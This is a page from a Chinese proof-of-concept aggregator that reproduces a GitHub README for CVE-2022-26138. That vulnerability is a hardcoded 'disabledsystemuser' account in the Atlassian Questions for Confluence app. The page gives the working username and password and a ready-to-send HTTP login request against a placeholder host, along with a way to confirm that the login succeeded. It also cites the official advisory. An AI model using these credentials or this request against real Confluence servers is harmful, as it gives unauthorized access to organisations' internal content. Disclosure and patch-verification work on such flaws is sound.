POC详情: 47584d719b365b6de5481c334e0270b4ee7927f6

来源
关联漏洞
标题: Atlassian Confluence Server 信任管理问题漏洞 (CVE-2022-26138)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Server 和 Data Center 存在安全漏洞,该漏洞源于使用硬编码密码。
描述
Atlassian Questions Hardcoded Password (CVE-2022-26138)
介绍
# CVE-2022-26138 POC
![questions_cve](https://user-images.githubusercontent.com/105424007/180184601-06a62fae-a5ba-412f-9304-d9c3abb0c400.png)

## Description
```
The Atlassian Questions For Confluence app for Confluence Server and Data Center 
creates a Confluence user account in the confluence-users group with 
the username disabledsystemuser and a hardcoded password. A remote, 
unauthenticated attacker with knowledge of the hardcoded password could
exploit this to log into Confluence and access all content accessible 
to users in the confluence-users group. 
This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.
```

## POC
Hardcoded Credentials: 
 - User: `disabledsystemuser`
 - Password: `disabled1system1user6708`

## Exploitation
```
POST /dologin.action HTTP/1.1
Host: victim.local
Content-Type: application/x-www-form-urlencoded

os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Fvulnerable.action
```
If the server redirects to `/vulnerable.action`, credentials are valid.

## Were did you get the creds from?

The hardcoded credential were plainly laying inside the jar files of the affected plugin

`https://packages.atlassian.com/maven-atlassian-external/com/atlassian/confluence/plugins/confluence-questions/3.0.2/confluence-questions-3.0.2.jar`

## References
* https://www.cvedetails.com/cve/CVE-2022-26138/
* https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html
* https://jira.atlassian.com/browse/CONFSERVER-79483
文件快照

[4.0K] /data/pocs/47584d719b365b6de5481c334e0270b4ee7927f6 └── [1.5K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。